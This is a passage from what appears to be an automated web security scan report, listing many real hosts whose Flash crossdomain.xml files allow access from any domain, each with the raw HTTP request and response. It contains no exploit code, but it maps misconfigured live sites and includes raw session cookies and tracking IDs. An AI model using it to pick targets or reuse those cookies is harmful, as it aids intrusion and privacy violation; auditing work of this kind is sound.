GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 30 Jan 2011 13:15:44 GMT
Date: Sat, 29 Jan 2011 13:15:44 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 44616

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.3. http://ak.c.ooyala.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ak.c.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: ak.c.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: wpK4wcLXOVar2wzl8i2KDRsRUb/FDGbkmhSofLdqHUeOScSp9vxoM5FhXzpTep7i
x-amz-request-id: 756D4F260FA6AE9C
Last-Modified: Mon, 12 Jan 2009 21:58:46 GMT
ETag: "124fa42a56284acbe74862f0024af4f3"
Content-Type: text/x-cross-domain-policy
Content-Length: 157
Server: AmazonS3
Cache-Control: max-age=604800
Date: Sun, 30 Jan 2011 12:49:00 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.4. http://amch.questionmarket.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:43:30 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "2005439f-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=120, max=218
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

6.5. http://ar.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:19 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.6. http://atl.whitepages.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: atl.whitepages.com

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:27 GMT
X-DirectServer: whitepg_DS4
Content-Type: text/xml
Content-Length: 95
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" secure="true"/>
</cross-domain-policy>

6.7. http://b.rad.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.rad.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 01:07:24 GMT
Accept-Ranges: bytes
ETag: "02ee18f7b9cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:40:48 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.8. http://b.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 31 Jan 2011 01:40:59 GMT
Date: Sun, 30 Jan 2011 01:40:59 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.9. http://b3.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:41:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 03:38:56 GMT
ETag: "1ae5fe-d0-f2349400"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.10. http://beta-ads.ace.advertising.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta-ads.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beta-ads.ace.advertising.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:06:03 GMT
Content-Type: text/xml
Content-Length: 81
Date: Sun, 30 Jan 2011 02:06:03 GMT
Connection: close
Set-Cookie: A07L=CT; expires=Sun, 27-Feb-2011 02:06:03 GMT; path=/; domain=beta-ads.ace.advertising.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.11. http://blstj.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://blstj.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: blstj.redacted

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
S: BLUMPPSTCA01
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Content-Length: 224
Age: 6330306
Date: Sun, 30 Jan 2011 01:41:05 GMT
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Expires: Thu, 17 Nov 2011 19:15:59 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.redacted" />
<allow-access-from domain="*"/>
...[SNIP]...

6.12. http://college.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://college.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: college.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://college.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:e39"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.13. http://collegebasketball.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://collegebasketball.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: collegebasketball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://collegebasketball.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:e39"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.14. http://collegefootball.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://collegefootball.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: collegefootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://collegefootball.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.15. http://colstc.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://colstc.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: colstc.redacted

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca04
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:42:42 GMT
Content-Length: 224
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.redacted" />
<allow-access-from domain="*"/>
...[SNIP]...

6.16. http://colstj.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://colstj.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: colstj.redacted

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca03
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:42:45 GMT
Content-Length: 224
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.redacted" />
<allow-access-from domain="*"/>
...[SNIP]...

6.17. http://ec.redcated/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.redcated
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ec.redcated

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Age: 183121
Date: Sun, 30 Jan 2011 02:08:12 GMT
Expires: Thu, 03 Feb 2011 23:16:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.18. http://edge1.catalog.video.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge1.catalog.video.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: edge1.catalog.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-redacted/flash/gallerywidget/1_0/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8cf9e94b1113cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 56616
Date: Sun, 30 Jan 2011 12:57:25 GMT
Last-Modified: Wed, 23 Jun 2010 20:18:51 GMT
Expires: Sat, 12 Feb 2011 21:13:49 GMT
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://edge2.catalog.video.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge2.catalog.video.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: edge2.catalog.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-redacted/flash/gallerywidget/1_0/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8cf9e94b1113cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 200630
Date: Sun, 30 Jan 2011 12:57:41 GMT
Last-Modified: Wed, 23 Jun 2010 20:18:51 GMT
Expires: Fri, 11 Feb 2011 05:13:50 GMT
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

6.20. http://edge3.catalog.video.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge3.catalog.video.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: edge3.catalog.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-redacted/flash/gallerywidget/1_0/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8cf9e94b1113cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 394973
Date: Sun, 30 Jan 2011 12:56:49 GMT
Last-Modified: Wed, 23 Jun 2010 20:18:51 GMT
Expires: Tue, 08 Feb 2011 23:13:56 GMT
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

6.21. http://edge4.catalog.video.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge4.catalog.video.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: edge4.catalog.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-redacted/flash/gallerywidget/1_0/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8cf9e94b1113cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 85390
Date: Sun, 30 Jan 2011 12:56:51 GMT
Last-Modified: Wed, 23 Jun 2010 20:18:51 GMT
Expires: Sat, 12 Feb 2011 13:13:41 GMT
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. http://edge5.catalog.video.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge5.catalog.video.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: edge5.catalog.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-redacted/flash/gallerywidget/1_0/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8cf9e94b1113cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 218591
Date: Sun, 30 Jan 2011 12:56:59 GMT
Last-Modified: Wed, 23 Jun 2010 20:18:51 GMT
Expires: Fri, 11 Feb 2011 00:13:48 GMT
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

6.23. http://i4.ytimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: i4.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Sun, 30 Jan 2011 11:11:18 GMT
Expires: Sun, 06 Feb 2011 11:11:18 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 5862
Content-Length: 102

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.24. http://jcfootball.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://jcfootball.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: jcfootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://jcfootball.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.25. http://mlb.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mlb.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://mlb.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:37 GMT
